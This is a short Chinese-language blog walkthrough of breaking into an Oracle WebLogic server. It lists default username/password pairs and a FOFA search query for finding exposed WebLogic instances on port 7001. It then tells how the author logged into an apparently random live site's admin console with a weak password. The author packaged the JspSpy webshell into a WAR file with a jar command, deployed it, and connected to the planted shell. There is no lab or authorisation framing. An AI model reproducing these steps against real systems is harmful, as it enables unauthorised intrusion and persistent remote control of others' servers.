weblogic常见弱口令
Weblogic 默认口令:https://cirt.net/passwords?criteria=weblogic
system/password
weblogic/weblogic
admin/security
joe/password
mary/password
system/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem
1.信息收集
- 通过空间搜索引擎fofa进行被动信息收集。
app="BEA-WebLogic-Server" && port="7001"
- 锁定了一个网站,进入登录界面。
漏洞利用
-
找了一个网站尝试弱口令进入后台,试了几次竟然进去了!
-
选择部署,进入如下页面,上传war包。
-
到这一步就开始制作war包,这里我选择将jsp的大马制作成war包。(
jar -cvf test.war JspSpy.jsp
制作成功如图
- 上传war包。
Getshell
-
war包已经上传成功,接下来访问大马文件http://IP:7001/test/JspSpy.jsp,需要验证密码:
验证密码在jsp文件里。
-
成功连接大马!